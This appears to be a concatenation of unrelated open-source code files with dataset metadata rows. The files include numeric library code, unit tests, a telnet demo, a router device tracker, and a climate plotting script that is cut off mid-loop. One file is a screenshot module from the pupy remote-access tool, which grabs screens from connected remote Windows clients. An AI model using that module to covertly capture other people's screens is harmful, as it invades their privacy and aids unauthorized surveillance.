def poisson(lam=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a Poisson distribution.
Parameters
----------
lam: Expectation of interval, should be > 0.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.poisson(lam=1, size=(3,3))
>>> m1.toNumPy()
array([[ 1., 0., 2.],
[ 1., 0., 0.],
[ 0., 0., 0.]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
lam = asStr(lam)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.poisson(', rows, ',', cols, ',', sparsity, ',', lam, ')\n'])
| apache-2.0 | -8,600,682,359,173,167,000 | 32.5 | 140 | 0.598526 | false |
zigitax/pupy | pupy/modules/screenshot.py | 27 | 3951 | # -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot on a specific screen (default all screen on one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
| bsd-3-clause | -7,028,888,693,545,197,000 | 49.012658 | 756 | 0.727158 | false |
PaddlePaddle/Paddle | python/paddle/fluid/tests/unittests/mkldnn/test_quantize_mkldnn_op.py | 2 | 6353 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest
class TestQuantizeOp(OpTest):
def setUp(self):
self.op_type = 'quantize'
self.scale = 255.0
self.shift = 0.0
self.input_size = [1, 1, 5, 5] # Naive nChw16c
self.is_negative = False
self.output_format = 'NCHW'
self.set_scale()
self.set_shift()
self.set_is_negative()
self.set_input_size()
self.set_output_format()
self.prepare_input()
self.prepare_output()
def prepare_input(self):
if self.is_negative:
# input data values are from interval [-1.0, 1.0)
self.input = (2 * np.random.random_sample(self.input_size) - 1
).astype('float32')
else:
# input data values are from interval [0.0, 1.0)
self.input = (
np.random.random_sample(self.input_size)).astype('float32')
self.inputs = {'Input': OpTest.np_dtype_to_fluid_dtype(self.input)}
self.attrs = {
'Scale': self.scale,
'Shift': self.shift,
'is_negative_input': self.is_negative,
'output_format': self.output_format
}
def prepare_output(self):
input_data_type = 'int8' if self.is_negative else 'uint8'
output = np.rint(self.input * self.scale + self.shift).astype(
input_data_type)
self.outputs = {'Output': output}
def test_check_output(self):
# TODO(wangzhongpu): support mkldnn op in dygraph mode
self.check_output(check_dygraph=False)
def check_raise_error(self, msg):
try:
self.check_output()
except Exception as e:
if msg in str(e):
raise AttributeError
else:
print(e)
def set_scale(self):
pass
def set_shift(self):
pass
def set_is_negative(self):
pass
def set_input_size(self):
pass
def set_output_format(self):
pass
class TestQuantizeOp1(TestQuantizeOp):
def set_scale(self):
self.scale = 127.0
def set_is_negative(self):
self.is_nagative = True
class TestQuantizeOp2(TestQuantizeOp):
def set_scale(self):
self.scale = 255.0
def set_is_negative(self):
self.is_nagative = False
class TestQuantizeOp_ZeroScale(TestQuantizeOp):
def set_scale(self):
self.scale = 0.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization scale cannot be 0.0')
# 2-dim input
# P - positive input
class TestQuantizeOpShift_NCHW_2_P(TestQuantizeOp):
def set_output_format(self):
self.output_format = 'NCHW'
def set_is_negative(self):
self.is_nagative = False
def set_scale(self):
self.scale = 255.0
def set_shift(self):
self.shift = 0.0
def set_input_size(self):
self.input_size = [2, 3]
# 2-dim input
# N - negative input
class TestQuantizeOpShift_NCHW_2_N(TestQuantizeOpShift_NCHW_2_P):
def set_is_negative(self):
self.is_nagative = True
def set_scale(self):
self.scale = 127.0
def set_shift(self):
self.shift = 128.0
class TestQuantizeOpShift_NHWC_2_P(TestQuantizeOpShift_NCHW_2_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_2_N(TestQuantizeOpShift_NCHW_2_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 3-dim input
class TestQuantizeOpShift_NCHW_3_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NCHW_3_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NHWC_3_P(TestQuantizeOpShift_NCHW_3_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_3_N(TestQuantizeOpShift_NCHW_3_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 4-dim input
class TestQuantizeOpShift_NCHW_4_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NCHW_4_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NHWC_4_P(TestQuantizeOpShift_NCHW_4_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_4_N(TestQuantizeOpShift_NCHW_4_N):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOp_NegativeShift(TestQuantizeOp):
def set_is_negative(self):
self.is_nagative = False
def set_scale(self):
self.scale = 100.0
def set_shift(self):
self.shift = -10.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization shift must be nonnegative.')
class TestQuantizeOp_TooBigShift(TestQuantizeOp_NegativeShift):
def set_shift(self):
self.shift = 300.0
def test_check_output(self):
self.assertRaises(
AttributeError, self.check_raise_error,
'Quantization shift must be less than or equal to 255.')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,742,969,942,922,523,000 | 26.149573 | 75 | 0.629309 | false |
seler/gipsy | gipsy/dashboard/presets/google_analytics.py | 4 | 1666 | from gipsy.dashboard.dashboard import Dashboard
from gipsy.dashboard.widgets import widgets, widgets_google_analytics
class DashboardDefault(Dashboard):
"""
Defaut and exemple class for dashboards using google analytics specific widgets.
This class simply uses a render method where widgets are added. The widgets property is a list
that can be appended as follow.
The google analytics widgets are plug and play but of course feel free to overwrite them.
Read the documentation for more information on how to setup google analytics on yourapplication.
"""
def render(self):
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGAPageViewsEvolution())
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGASessionsEvolution())
# metrics single
self.widgets.append(widgets.WidgetMetricsSingle(
title='currently active users',
label='active users',
count=2564,
))
# line chart
self.widgets.append(widgets_google_analytics.WidgetGALineChart())
# metrics list
self.widgets.append(widgets.WidgetMetricsList(items=[
{'icon': 'fa-file-image-o', 'label': 'posts', 'value': 75},
{'icon': 'fa-comment-o', 'label': 'comments', 'value': 192},
{'icon': 'fa-files-o', 'label': 'pages', 'value': 12},
{'icon': 'fa-flag-o', 'label': 'in moderation', 'value': 4},
]))
# model list
self.widgets.append(widgets.WidgetModelList(items={}))
# admin logs
self.widgets.append(widgets.WidgetAdminLog())
| bsd-3-clause | -17,095,780,913,899,328 | 38.666667 | 100 | 0.654862 | false |
girishramnani/hacking-tools | pyhashcat/sre_yield/tests/test_cachingseq.py | 3 | 2039 | #!/usr/bin/env python2
#
# Copyright 2011-2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from sre_yield import cachingseq
class CachingFuncSequenceTest(unittest.TestCase):
def testLimits(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
self.assertEqual(9, c[9])
self.assertEqual(9, c[-1])
self.assertEqual(0, c[0])
self.assertEqual(0, c[-10])
self.assertRaises(IndexError, lambda: c[10])
self.assertRaises(IndexError, lambda: c[11])
self.assertRaises(IndexError, lambda: c[-11])
self.assertRaises(IndexError, lambda: c[-12])
self.assertEqual(2, len(c._cache))
# Make sure .func is settable at runtime...
c.func = lambda i: 'bbb'
self.assertEqual('bbb', c[1])
# ...and that we don't call it again.
self.assertEqual(0, c[0])
def testIter(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
# Cache empty on construction
self.assertEqual(0, len(c._cache))
self.assertEqual(10, len(c))
self.assertEqual(list(range(10)), list(c))
# Cache full after iteration
self.assertEqual(10, len(c._cache))
def testIncFunc(self):
def first_func(x):
assert x == 0
return 1
def inc_func(i, prev):
return prev * 2
c = cachingseq.CachingFuncSequence(first_func, 10, inc_func)
self.assertEqual([1, 2, 4, 8, 16, 32, 64, 128, 256, 512], list(c))
| mit | -6,653,969,502,603,725,000 | 32.42623 | 74 | 0.642962 | false |
earshel/PokeyPySnipe | POGOProtos/Networking/Requests/Messages/EncounterMessage_pb2.py | 16 | 3623 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/EncounterMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/EncounterMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\n>POGOProtos/Networking/Requests/Messages/EncounterMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"s\n\x10\x45ncounterMessage\x12\x14\n\x0c\x65ncounter_id\x18\x01 \x01(\x06\x12\x16\n\x0espawn_point_id\x18\x02 \x01(\t\x12\x17\n\x0fplayer_latitude\x18\x03 \x01(\x01\x12\x18\n\x10player_longitude\x18\x04 \x01(\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ENCOUNTERMESSAGE = _descriptor.Descriptor(
name='EncounterMessage',
full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='encounter_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.encounter_id', index=0,
number=1, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='spawn_point_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.spawn_point_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_latitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_latitude', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_longitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_longitude', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=107,
serialized_end=222,
)
DESCRIPTOR.message_types_by_name['EncounterMessage'] = _ENCOUNTERMESSAGE
EncounterMessage = _reflection.GeneratedProtocolMessageType('EncounterMessage', (_message.Message,), dict(
DESCRIPTOR = _ENCOUNTERMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.EncounterMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.EncounterMessage)
))
_sym_db.RegisterMessage(EncounterMessage)
# @@protoc_insertion_point(module_scope)
| mit | -4,732,532,667,061,366,000 | 39.255556 | 360 | 0.742479 | false |
google-code/android-scripting | python/src/Demo/sockets/telnet.py | 47 | 3010 | #! /usr/bin/env python
# Minimal interface to the Internet telnet protocol.
#
# It refuses all telnet options and does not recognize any of the other
# telnet commands, but can still be used to connect in line-by-line mode.
# It's also useful to play with a number of other services,
# like time, finger, smtp and even ftp.
#
# Usage: telnet host [port]
#
# The port may be a service name or a decimal port number;
# it defaults to 'telnet'.
import sys, posix, time
from socket import *
BUFSIZE = 1024
# Telnet protocol characters
IAC = chr(255) # Interpret as command
DONT = chr(254)
DO = chr(253)
WONT = chr(252)
WILL = chr(251)
def main():
host = sys.argv[1]
try:
hostaddr = gethostbyname(host)
except error:
sys.stderr.write(sys.argv[1] + ': bad host name\n')
sys.exit(2)
#
if len(sys.argv) > 2:
servname = sys.argv[2]
else:
servname = 'telnet'
#
if '0' <= servname[:1] <= '9':
port = eval(servname)
else:
try:
port = getservbyname(servname, 'tcp')
except error:
sys.stderr.write(servname + ': bad tcp service name\n')
sys.exit(2)
#
s = socket(AF_INET, SOCK_STREAM)
#
try:
s.connect((host, port))
except error, msg:
sys.stderr.write('connect failed: ' + repr(msg) + '\n')
sys.exit(1)
#
pid = posix.fork()
#
if pid == 0:
# child -- read stdin, write socket
while 1:
line = sys.stdin.readline()
s.send(line)
else:
# parent -- read socket, write stdout
iac = 0 # Interpret next char as command
opt = '' # Interpret next char as option
while 1:
data = s.recv(BUFSIZE)
if not data:
# EOF; kill child and exit
sys.stderr.write( '(Closed by remote host)\n')
posix.kill(pid, 9)
sys.exit(1)
cleandata = ''
for c in data:
if opt:
print ord(c)
s.send(opt + c)
opt = ''
elif iac:
iac = 0
if c == IAC:
cleandata = cleandata + c
elif c in (DO, DONT):
if c == DO: print '(DO)',
else: print '(DONT)',
opt = IAC + WONT
elif c in (WILL, WONT):
if c == WILL: print '(WILL)',
else: print '(WONT)',
opt = IAC + DONT
else:
print '(command)', ord(c)
elif c == IAC:
iac = 1
print '(IAC)',
else:
cleandata = cleandata + c
sys.stdout.write(cleandata)
sys.stdout.flush()
try:
main()
except KeyboardInterrupt:
pass
| apache-2.0 | 3,464,976,746,490,562,600 | 26.614679 | 73 | 0.470432 | false |
viralpandey/kivy | kivy/geometry.py | 47 | 3795 | '''
Geometry utilities
==================
This module contains some helper functions for geometric calculations.
'''
__all__ = ('circumcircle', 'minimum_bounding_circle')
from kivy.vector import Vector
def circumcircle(a, b, c):
'''
Computes the circumcircle of a triangle defined by a, b, c.
See: http://en.wikipedia.org/wiki/Circumscribed_circle
:Parameters:
`a` : iterable containing at least 2 values (for x and y)
The 1st point of the triangle.
`b` : iterable containing at least 2 values (for x and y)
The 2nd point of the triangle.
`c` : iterable containing at least 2 values (for x and y)
The 3rd point of the triangle.
:Return:
A tuple that defines the circle :
* The first element in the returned tuple is the center as (x, y)
* The second is the radius (float)
'''
P = Vector(a[0], a[1])
Q = Vector(b[0], b[1])
R = Vector(c[0], c[1])
mPQ = (P + Q) * .5
mQR = (Q + R) * .5
numer = -(- mPQ.y * R.y + mPQ.y * Q.y + mQR.y * R.y - mQR.y * Q.y
- mPQ.x * R.x + mPQ.x * Q.x + mQR.x * R.x - mQR.x * Q.x)
denom = (-Q.x * R.y + P.x * R.y - P.x * Q.y +
Q.y * R.x - P.y * R.x + P.y * Q.x)
t = numer / denom
cx = -t * (Q.y - P.y) + mPQ.x
cy = t * (Q.x - P.x) + mPQ.y
return ((cx, cy), (P - (cx, cy)).length())
def minimum_bounding_circle(points):
'''
Returns the minimum bounding circle for a set of points.
For a description of the problem being solved, see the `Smallest Circle
Problem <http://en.wikipedia.org/wiki/Smallest_circle_problem>`_.
The function uses Applet's Algorithm, the runtime is O\(h^3, \*n\),
where h is the number of points in the convex hull of the set of points.
**But** it runs in linear time in almost all real world cases.
See: http://tinyurl.com/6e4n5yb
:Parameters:
`points` : iterable
A list of points (2 tuple with x,y coordinates)
:Return:
A tuple that defines the circle:
* The first element in the returned tuple is the center (x, y)
* The second the radius (float)
'''
points = [Vector(p[0], p[1]) for p in points]
if len(points) == 1:
return (points[0].x, points[0].y), 0.0
if len(points) == 2:
p1, p2 = points
return (p1 + p2) * .5, ((p1 - p2) * .5).length()
# determine a point P with the smallest y value
P = min(points, key=lambda p: p.y)
# find a point Q such that the angle of the line segment
# PQ with the x axis is minimal
def x_axis_angle(q):
if q == P:
return 1e10 # max val if the same, to skip
return abs((q - P).angle((1, 0)))
Q = min(points, key=x_axis_angle)
for p in points:
# find R such that angle PRQ is minimal
def angle_pq(r):
if r in (P, Q):
return 1e10 # max val if the same, to skip
return abs((r - P).angle(r - Q))
R = min(points, key=angle_pq)
# check for case 1 (angle PRQ is obtuse), the circle is determined
# by two points, P and Q. radius = |(P-Q)/2|, center = (P+Q)/2
if angle_pq(R) > 90.0:
return (P + Q) * .5, ((P - Q) * .5).length()
# if angle RPQ is obtuse, make P = R, and try again
if abs((R - P).angle(Q - P)) > 90:
P = R
continue
# if angle PQR is obtuse, make Q = R, and try again
if abs((P - Q).angle(R - Q)) > 90:
Q = R
continue
# all angles were acute..we just need the circle through the
# two points furthest apart!
break
# find the circumcenter for triangle given by P,Q,R
return circumcircle(P, Q, R)
| mit | -7,776,645,507,134,660,000 | 30.363636 | 76 | 0.548353 | false |
teodoc/home-assistant | homeassistant/components/device_tracker/luci.py | 10 | 5820 | """
homeassistant.components.device_tracker.luci
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Device tracker platform that supports scanning a OpenWRT router for device
presence.
It's required that the luci RPC package is installed on the OpenWRT router:
# opkg install luci-mod-rpc
Configuration:
To use the Luci tracker you will need to add something like the following
to your config/configuration.yaml
device_tracker:
platform: luci
host: YOUR_ROUTER_IP
username: YOUR_ADMIN_USERNAME
password: YOUR_ADMIN_PASSWORD
Variables:
host
*Required
The IP address of your router, e.g. 192.168.1.1.
username
*Required
The username of an user with administrative privileges, usually 'admin'.
password
*Required
The password for your given admin account.
"""
import logging
import json
from datetime import timedelta
import re
import threading
import requests
from homeassistant.const import CONF_HOST, CONF_USERNAME, CONF_PASSWORD
from homeassistant.helpers import validate_config
from homeassistant.util import Throttle
from homeassistant.components.device_tracker import DOMAIN
# Return cached results if last scan was less then this time ago
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
def get_scanner(hass, config):
""" Validates config and returns a Luci scanner. """
if not validate_config(config,
{DOMAIN: [CONF_HOST, CONF_USERNAME, CONF_PASSWORD]},
_LOGGER):
return None
scanner = LuciDeviceScanner(config[DOMAIN])
return scanner if scanner.success_init else None
# pylint: disable=too-many-instance-attributes
class LuciDeviceScanner(object):
""" This class queries a wireless router running OpenWrt firmware
for connected devices. Adapted from Tomato scanner.
# opkg install luci-mod-rpc
for this to work on the router.
The API is described here:
http://luci.subsignal.org/trac/wiki/Documentation/JsonRpcHowTo
(Currently, we do only wifi iwscan, and no DHCP lease access.)
"""
def __init__(self, config):
host = config[CONF_HOST]
username, password = config[CONF_USERNAME], config[CONF_PASSWORD]
self.parse_api_pattern = re.compile(r"(?P<param>\w*) = (?P<value>.*);")
self.lock = threading.Lock()
self.last_results = {}
self.token = _get_token(host, username, password)
self.host = host
self.mac2name = None
self.success_init = self.token is not None
def scan_devices(self):
""" Scans for new devices and return a
list containing found device ids. """
self._update_info()
return self.last_results
def get_device_name(self, device):
""" Returns the name of the given device or None if we don't know. """
with self.lock:
if self.mac2name is None:
url = 'http://{}/cgi-bin/luci/rpc/uci'.format(self.host)
result = _req_json_rpc(url, 'get_all', 'dhcp',
params={'auth': self.token})
if result:
hosts = [x for x in result.values()
if x['.type'] == 'host' and
'mac' in x and 'name' in x]
mac2name_list = [
(x['mac'].upper(), x['name']) for x in hosts]
self.mac2name = dict(mac2name_list)
else:
# Error, handled in the _req_json_rpc
return
return self.mac2name.get(device.upper(), None)
@Throttle(MIN_TIME_BETWEEN_SCANS)
def _update_info(self):
""" Ensures the information from the Luci router is up to date.
Returns boolean if scanning successful. """
if not self.success_init:
return False
with self.lock:
_LOGGER.info("Checking ARP")
url = 'http://{}/cgi-bin/luci/rpc/sys'.format(self.host)
result = _req_json_rpc(url, 'net.arptable',
params={'auth': self.token})
if result:
self.last_results = []
for device_entry in result:
# Check if the Flags for each device contain
# NUD_REACHABLE and if so, add it to last_results
if int(device_entry['Flags'], 16) & 0x2:
self.last_results.append(device_entry['HW address'])
return True
return False
def _req_json_rpc(url, method, *args, **kwargs):
""" Perform one JSON RPC operation. """
data = json.dumps({'method': method, 'params': args})
try:
res = requests.post(url, data=data, timeout=5, **kwargs)
except requests.exceptions.Timeout:
_LOGGER.exception("Connection to the router timed out")
return
if res.status_code == 200:
try:
result = res.json()
except ValueError:
# If json decoder could not parse the response
_LOGGER.exception("Failed to parse response from luci")
return
try:
return result['result']
except KeyError:
_LOGGER.exception("No result in response from luci")
return
elif res.status_code == 401:
# Authentication error
_LOGGER.exception(
"Failed to authenticate, "
"please check your username and password")
return
else:
_LOGGER.error("Invalid response from luci: %s", res)
def _get_token(host, username, password):
""" Get authentication token for the given host+username+password """
url = 'http://{}/cgi-bin/luci/rpc/auth'.format(host)
return _req_json_rpc(url, 'login', username, password)
| mit | -6,545,202,801,521,779,000 | 30.630435 | 79 | 0.600859 | false |
zmlabe/IceVarFigs | Scripts/SeaSurfaceTemperatures/plot_ersst5.py | 1 | 5197 | """
Plot selected years of monthly ERSSTv5 global data
Website : https://www1.ncdc.noaa.gov/pub/data/cmb/ersst/v5/netcdf/
Author : Zachary M. Labe
Date : 22 July 2017
"""
from netCDF4 import Dataset
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
import numpy as np
import datetime
import nclcmaps as ncm
### Read in data files from server
directoryfigure = './Figures/'
directorydata = './Data/'
### Define constants
now = datetime.datetime.now()
month = now.month
monthsq = [r'Jan',r'Feb',r'Mar',r'Apr',r'May',r'Jun',r'Jul',
r'Aug',r'Sep',r'Oct',r'Nov',r'Dec',r'Jan']
### Input selected years and months!
years = np.arange(1992,2016+1,1)
months = np.arange(1,12+1,1)
### Read in data
sst = np.empty((years.shape[0],months.shape[0],89,180))
for i in range(years.shape[0]):
for j in range(months.shape[0]):
filename = directorydata + 'ersst.v5.%s%02d.nc' % (years[i],
months[j])
data = Dataset(filename)
lats = data.variables['lat'][:]
lons = data.variables['lon'][:]
sst[i,j,:,:] = data.variables['sst'][0,0,:,:]
data.close()
print('Completed: Read %s year!' % years[i])
### Locate missing data
sst[np.where(sst == -999)] = np.nan
### Reshape data
sst = np.reshape(sst,(300,89,180))
### Create list of years for plotting
yearsqq = np.repeat(years,12)
###############################################################################
###############################################################################
###############################################################################
### Plot figure
### Define parameters (dark)
def setcolor(x, color):
for m in x:
for t in x[m][1]:
t.set_color(color)
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
plt.rc('savefig',facecolor='black')
plt.rc('axes',edgecolor='k')
plt.rc('xtick',color='white')
plt.rc('ytick',color='white')
plt.rc('axes',labelcolor='white')
plt.rc('axes',facecolor='black')
### Select map type
style = 'global'
if style == 'ortho':
m = Basemap(projection='ortho',lon_0=-90,
lat_0=70,resolution='l',round=True)
elif style == 'polar':
m = Basemap(projection='npstere',boundinglat=67,lon_0=270,resolution='l',round =True)
elif style == 'global':
m = Basemap(projection='moll',lon_0=0,resolution='l',area_thresh=10000)
### Begin loop of years/months
for i in range(sst.shape[0]):
fig = plt.figure()
ax = plt.subplot(111)
for txt in fig.texts:
txt.set_visible(False)
var = sst[i,:,:]
m.drawmapboundary(fill_color='k')
m.drawcoastlines(color='k',linewidth=0.4)
### Colorbar limits
barlim = np.arange(0,31,5)
### Make the plot continuous
var, lons_cyclic = addcyclic(var, lons)
var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
x, y = m(lon2d, lat2d)
cs = plt.contourf(x,y,var,np.arange(-1.8,31.1,1),
extend='max')
cmap = ncm.cmap('MPL_gnuplot')
cs.set_cmap(cmap)
t = plt.annotate(r'\textbf{%s}' % yearsqq[i],textcoords='axes fraction',
xy=(0,0), xytext=(0.34,1.03),
fontsize=50,color='w',alpha=0.6)
t1 = plt.annotate(r'\textbf{GRAPHIC}: Zachary Labe (@ZLabe)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.167),
fontsize=4.5,color='w',alpha=0.6)
t2 = plt.annotate(r'\textbf{SOURCE}: https://www1.ncdc.noaa.gov/',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.197),
fontsize=4.5,color='w',alpha=0.6)
t3 = plt.annotate(r'\textbf{DATA}: NOAA ERSSTv5, Huang et al. (2017)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.227),
fontsize=4.5,color='w',alpha=0.6)
t4 = plt.annotate(r'\textbf{SEA SURFACE TEMPERATURES}',
textcoords='axes fraction',
xy=(0,0), xytext=(0.24,-0.036),fontsize=13,color='w',alpha=0.6)
m.fillcontinents(color='k')
cbar = plt.colorbar(cs,drawedges=False,orientation='horizontal',
pad = 0.04,fraction=0.035)
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.set_label(r'\textbf{$\bf{^\circ}$\textbf{C}}',fontsize=13,
color='w')
cbar.ax.tick_params(axis='x', size=.001)
cbar.ax.tick_params(labelsize=6)
plt.subplots_adjust(bottom=0.2)
### Save figure to create animation using ImageMagick
if i < 10:
